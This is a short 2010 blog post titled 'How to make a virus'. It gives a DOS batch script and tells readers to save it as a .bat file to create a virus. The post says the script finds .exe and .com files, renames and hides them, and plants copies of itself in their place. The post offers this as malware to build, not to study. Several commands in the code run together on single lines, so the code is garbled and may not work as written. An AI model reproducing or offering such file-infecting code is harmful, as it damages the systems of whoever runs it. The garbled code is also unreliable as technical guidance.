Saturday, October 23, 2010

How to make a virus

   Making Virus is very easy, but making virus that is not detected by antivirus is very difficult.This
is a virus code it will not be able to harm ur pc if u have updated antivirus, but dont try this code
in ur pc if u don't hav antivirus.

Just write this code in notepad and save the file with .bat extension. Your virus is created.

Code :
     @echo off
     ctty nul
     for %%f in (*.exe *.com) do set A=%%f
     if %A%==COMMAND.COM set A=rename %A% V%A%
     if not exist V%A% goto end
     attrib +h V%A%copy %0.bat %A%attrib +r %A%
     ren %A% *.bat
     set A=
     ctty con
    @if exist %1 %2 %3
    @if exist V%0.exe V%0.exe %1 %2 %3

   The following virus, however, works in BAT format .It searches the directory for .COM files
and.EXE files . It then renames it to V at the beginning, hides it, and puts a batch file with the
same name into the directory that contains the virus. 

   More Interesting Stuff Will Be Posted Soon.....If u want any information please tell us throught 

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